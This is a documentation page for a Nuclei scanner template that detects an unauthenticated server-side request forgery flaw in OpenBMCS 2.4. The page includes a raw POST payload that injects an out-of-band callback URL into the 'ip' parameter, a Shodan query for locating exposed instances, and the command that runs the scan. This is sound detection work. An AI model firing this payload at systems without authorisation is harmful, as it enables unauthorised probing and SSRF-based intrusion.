OpenBMCS 2.4 - Server-Side Request Forgery / Remote File Inclusion
ID: openbmcs-ssrf
Severity: medium
Author: dhiyaneshDK
Tags: ssrf,oast,openbmcs,edb,misconfig
Description
Section titled “Description”OpenBMCS 2.4 is susceptible to unauthenticated server-side request forgery and remote file inclusion vulnerabilities within its functionalities. The application parses user supplied data in the POST parameter ‘ip’ to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host.
YAML Source
Section titled “YAML Source”id: openbmcs-ssrf
info: name: OpenBMCS 2.4 - Server-Side Request Forgery / Remote File Inclusion author: dhiyaneshDK severity: medium description: OpenBMCS 2.4 is susceptible to unauthenticated server-side request forgery and remote file inclusion vulnerabilities within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. reference: - https://www.exploit-db.com/exploits/50670 - https://securityforeveryone.com/tools/openbmcs-unauth-ssrf-rfi-vulnerability-scanner classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 6.8 cwe-id: CWE-918 metadata: max-request: 1 shodan-query: http.favicon.hash:1550906681 tags: ssrf,oast,openbmcs,edb,misconfig
http: - raw: - | POST /php/query.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8
ip={{interactsh-url}}:80&argu=/
matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "http"
- type: status status: - 302# digest: 490a0046304402205155d95257b9c18693f3de6fccafad786fdbe03a9942202d2ec16a4a4c52cfb002204fed2d95c0f6f82a6f73210e7279aff69284f3e7079c9906bd3b61735bcbb9ae:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/misconfiguration/openbmcs/openbmcs-ssrf.yaml"